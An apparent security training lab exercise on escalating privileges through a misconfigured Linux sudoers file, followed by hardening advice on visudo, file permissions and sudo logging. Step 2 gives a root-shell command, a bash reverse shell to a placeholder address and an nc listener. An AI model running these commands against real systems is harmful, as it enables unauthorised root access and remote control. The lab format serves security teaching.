Logo Light

Network

Web Apps

System

Cloud

Cryptography

IoT

Exercise 30: Compromising User Privileges with Insecure sudoers File

by | Jun 2, 2025 | 0 comments

Objective: Exploit vulnerabilities in the /etc/sudoers file, such as improper command permissions or incorrect configurations, to escalate privileges, and learn how to secure the sudoers file.

Scenario: The /etc/sudoers file controls what commands users can run with elevated privileges. Improper configurations, such as allowing a user to execute all commands without a password, can lead to privilege escalation. Your task is to identify and exploit such vulnerabilities and secure the sudoers file to prevent misuse.

Lab Setup

  1. Environment:
    • A Linux system with a misconfigured /etc/sudoers file.
  2. Tools Required:
    • Terminal access to the target system.
    • sudo command.

Lab Steps

Step 1: Review the /etc/sudoers File

  1. View the current sudo permissions: sudo -l
    • Example output: User bob may run the following commands on target: (ALL) NOPASSWD: /bin/bash
  2. Identify improper configurations, such as:
    • Commands that allow unrestricted access (e.g., (ALL) NOPASSWD: ALL).
    • Permissions to execute scripts or binaries writable by non-root users.

Step 2: Exploit the Misconfiguration

  1. If the output indicates unrestricted access, use the following command to spawn a root shell: sudo /bin/bash whoami
    • Expected output: root.
  2. If specific scripts are allowed, modify a writable script to include a reverse shell: echo 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1' > /path/to/vulnerable_script.sh chmod +x /path/to/vulnerable_script.sh
  3. Execute the modified script with sudo: sudo /path/to/vulnerable_script.sh
  4. Set up a listener on your machine: nc -lvnp 4444
    • Verify the reverse shell connection.

Step 3: Test Privilege Escalation

  1. Verify elevated privileges: id
  2. Document the steps used to escalate privileges.

Solution

Explanation:

  • The /etc/sudoers file controls elevated permissions. Misconfigurations can allow users to execute commands or scripts with root privileges, leading to unauthorized actions.

Prevention:

  1. Restrict Sudo Access:
    • Use visudo to edit the /etc/sudoers file safely: sudo visudo
    • Limit permissions to specific commands and trusted users. bob ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart apache2
  2. Audit Sudoers File Regularly:
    • Review the file for improper configurations: cat /etc/sudoers
  3. Restrict Script and File Permissions:
    • Ensure scripts executed with sudo are not writable by non-root users: chmod 700 /path/to/script.sh chown root:root /path/to/script.sh
  4. Monitor and Log Sudo Usage:
    • Enable sudo logging: Defaults logfile="/var/log/sudo.log"
    • Review logs for suspicious activity: sudo cat /var/log/sudo.log

Testing and Verification

  1. Attempt to execute commands with sudo to verify that permissions are restricted.
  2. Ensure that writable scripts or binaries cannot be modified by non-privileged users.
  3. Test sudo logging to confirm that all activities are properly recorded.

Reflection

This exercise demonstrates how misconfigurations in the /etc/sudoers file can lead to privilege escalation. By identifying and mitigating these vulnerabilities, you’ve gained valuable experience in securing elevated permissions on Linux systems.

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *